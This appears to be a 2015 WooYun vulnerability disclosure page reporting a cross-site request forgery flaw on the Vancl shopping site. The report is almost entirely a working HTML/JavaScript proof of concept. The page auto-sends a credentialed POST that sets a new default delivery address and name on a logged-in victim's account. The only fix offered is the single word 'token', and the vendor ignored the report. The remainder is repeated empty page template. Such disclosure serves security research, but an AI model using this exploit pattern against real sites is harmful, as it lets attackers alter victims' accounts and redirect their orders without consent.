凡客诚品CSRF可导致修改他人名称及默认收货地址 | wooyun-2015-0125482

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0125482

漏洞标题：

凡客诚品CSRF可导致修改他人名称及默认收货地址

漏洞详情

披露状态：

2015-07-09：细节已通知厂商并且等待厂商处理中
2015-07-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

见code

详细说明：

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://my.vancl.com/DeliveryAddress/Internal_SaveAddress", true);
        xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
        xhr.withCredentials = true;
        var body = "userName=%E5%B0%8F%E9%A9%AC&address=8888888&postCode=147258&phone=&mobile=18888888668&province=%e9%bb%91%e9%be%99%e6%b1%9f&city=%e4%bd%b3%e6%9c%a8%e6%96%af%e5%b8%82&area=%e6%a1%a6%e5%8d%97%e5%8e%bf&addressID=-1&actionType=Add&addressType=Inland&isDefaultAddress=true";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
      submitRequest();
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

漏洞证明：

修复方案：

token~

版权声明：转载请注明来源 Lucaroot@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-07-14 09:18

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lucaroot@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Lucaroot@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞